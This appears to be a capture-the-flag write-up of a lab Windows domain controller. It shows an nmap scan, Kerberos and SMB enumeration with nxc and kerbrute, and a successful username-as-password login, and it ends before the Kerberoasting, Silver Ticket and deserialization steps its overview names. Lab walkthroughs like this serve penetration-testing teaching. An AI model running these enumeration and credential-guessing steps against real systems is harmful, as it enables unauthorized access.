Overview
The machine starts with web enumeration that leaks two usernames, one of which uses its own name as its password. That grants SMB access and a public share containing a PDF that hints at a compromised SQL account. Kerberoasting the sqlsvc SPN yields a TGS hash that cracks easily, and since NTLM is disabled we forge a Silver Ticket to authenticate to MSSQL as administrator, query the ScrambleHR database to recover plaintext credentials for miscsvc, and WinRM in for user. A .NET sales client found in the IT share reveals a BinaryFormatter deserialization sink on port 4411, so we craft a WindowsIdentity gadget-chain payload and upload it to get RCE as NT AUTHORITY\SYSTEM.
Enumeration
As usual, we'll start with an nmap scan.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.12.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-11 04:22 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
Initiating Ping Scan at 04:22
Scanning 10.129.12.119 [2 ports]
Completed Ping Scan at 04:22, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:22
Completed Parallel DNS resolution of 1 host. at 04:22, 0.10s elapsed
Initiating Connect Scan at 04:22
Scanning 10.129.12.119 [1000 ports]
Discovered open port 135/tcp on 10.129.12.119
Discovered open port 139/tcp on 10.129.12.119
Discovered open port 80/tcp on 10.129.12.119
Discovered open port 445/tcp on 10.129.12.119
Discovered open port 53/tcp on 10.129.12.119
Discovered open port 88/tcp on 10.129.12.119
Discovered open port 3268/tcp on 10.129.12.119
Discovered open port 464/tcp on 10.129.12.119
Discovered open port 636/tcp on 10.129.12.119
Discovered open port 3269/tcp on 10.129.12.119
Discovered open port 389/tcp on 10.129.12.119
Discovered open port 593/tcp on 10.129.12.119
Discovered open port 1433/tcp on 10.129.12.119
Completed Connect Scan at 04:22, 9.73s elapsed (1000 total ports)
Initiating Service scan at 04:22
Scanning 13 services on 10.129.12.119
Completed Service scan at 04:23, 48.69s elapsed (13 services on 1 host)
NSE: Script scanning 10.129.12.119.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:23
NSE Timing: About 99.94% done; ETC: 04:23 (0:00:00 remaining)
Completed NSE at 04:23, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:23
Completed NSE at 04:24, 3.90s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.01s elapsed
Nmap scan report for 10.129.12.119
Host is up, received syn-ack (0.12s latency).
Scanned at 2026-06-11 04:22:18 PDT for 103s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| _ Potentially risky methods: TRACE
| _http-server-header: Microsoft-IIS/10.0
| _http-title: Scramble Corp Intranet
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-11 11:22:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| _ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| _ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-11T11:18:57
| Not valid after: 2056-06-11T11:18:57
| MD5: 600b:fc04:88ba:fd1a:cae9:6068:d112:c707
| SHA-1: f655:3d0e:434c:643c:a3a7:d500:0dac:9121:de4c:b2bc
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQI6oqk/qHr4tE/i4tmHO0wjANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjYwNjExMTExODU3WhgPMjA1NjA2MTExMTE4NTdaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPNezMjF
| /uVsZfk1wIbbX3BMeEC48nlVjt0MV2GUWiW84p4My3NeGJ6H+skbZDnxwqgNuLdI
| 2jV+yjuD+u9ueg8dFsvIvSQ7QeeQNRqzylz15Ib6f/YJCV9kmOItFTP0pAF6nwvN
| nM6/JtA8qnAV+d2EnPi1Zu98Z+60IOOmI+BTjVC7Sd1oLZd8RFzeC1y7XrR8I5yO
| AXlltqUnVpQNci8mC7usTpXvLNG5sQZl2xN6ApgaVsre0oCkGEQJbocFMYEEFWu7
| aXsWu31kc/nYVsvTXqrNPycmObqz8AtWBqkoKmsKPTDEz0efpZyQ+b+aKVRlROgS
| k40U1kJMCyY5rMkCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAyVi48OAxwEOo2yzC
| /wqKNZLQh66YBdHlXrwtyfTt/D5Dlw6z7Y1U6rzwr3x5iQGPYZQ5gQWIjwDF6/wM
| QGSRBYwCVI89iogF88kloFGdVHRB/QHYqxwV8ioinPme09YbMeSDYtcfcl/GDFLE
| uloEfkfgWtWQkDabOTC2KFkxefZabkoBkO9idO9sX8dma2H4tK+abgH6anJXFOdg
| KxkiNIWFe2MbXrkJaXydwLXYt02wt7ZojPkUhB8zw/pppafCIagobj3Rn0W8FwPf
| P7Mouh0sGIcUoylFlVfFdVo0z65o1nhkSckXF4QF46hnFBTKFSVG2RYSWllhaBvA
| INVzlA==
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43729/tcp): CLEAN (Timeout)
| Check 2 (port 45461/tcp): CLEAN (Timeout)
| Check 3 (port 28441/udp): CLEAN (Timeout)
| Check 4 (port 29483/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-11T11:23:21
| _ start_date: N/A
| _clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.44 seconds
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
And we got DNS, HTTP running a custom website with the title Scramble Corp Intranet, Kerberos, LDAP, SMB and MSSQL. The ms-sql-info and ms-sql-ntlm-info scripts both fail, which is worth keeping in mind. Other things to note:
- there is ADCS in place, with the CA scrm-DC1-CA issuing the LDAP certificate
- the domain name is scrm.local and the hostname is DC1, so the FQDN is DC1.scrm.local
- no clock skew, which matters since we will be leaning on Kerberos
So add the hostname, FQDN and domain name to your hosts file:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ echo '10.129.12.119 DC1 DC1.scrm.local scrm.local' | sudo tee -a /etc/hosts
10.129.12.119 DC1 DC1.scrm.local scrm.local
Trying to list shares as the Guest account first returns STATUS_NOT_SUPPORTED, because the server does not accept NTLM. Retrying with -k for Kerberos gives KDC_ERR_CLIENT_REVOKED instead, which means the KDC rejected the client principal. There are several reasons for that (disabled, locked out or expired account); the most likely one here is that the Guest account is disabled, as it is by default.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u Guest -p '' --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest: STATUS_NOT_SUPPORTED
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u Guest -p '' --shares -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest: KDC_ERR_CLIENT_REVOKED
With no Guest access to SMB and no LDAP null bind (that failed as well), the only other way in is the web server running on the target.
Website
And we got a website telling us that NTLM has been disabled for security reasons, plus links to other resources such as creating a new user account or requesting a password reset.

This page instructs us how to contact support, and we get two pieces of information that might come in handy later: two possible usernames
- support
- ksimpson

Another piece of information: there is an app for orders running on port 4411.

We can connect to it, but we don't know any commands it accepts, so we'll keep that in mind for now.

There is also a form to create a new user, but it doesn't seem to send any request to the backend.

And the password reset page has nothing.

So for now I'll start fuzzing the website for vhosts and directories, and while that is running I'll look into the leaked usernames and whether we can do anything with them.
ksimpson User
Looking into this user, kerbrute confirms it is valid, but it requires pre-authentication, so we can't AS-REP roast it (get an AS-REP hash and crack it offline).
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kerbrute userenum -d scrm.local --dc 10.129.12.119 usernames --downgrade
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/11/26 - Ronnie Flathers @ropnop
2026/06/11 05:04:02 > Using downgraded encryption: arcfour-hmac-md5
2026/06/11 05:04:02 > Using KDC(s):
2026/06/11 05:04:02 > 10.129.12.119:88
2026/06/11 05:04:02 > [+] VALID USERNAME: ksimpson@scrm.local
2026/06/11 05:04:02 > Done! Tested 2 usernames (1 valid) in 0.141 seconds
Trying the username as the password actually works, so we now have an account.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -p ksimpson -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\ksimpson:ksimpson
There are three non-standard shares (HR, IT and Sales) that we don't have access to, but we can read the Public share, so let's take a look.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
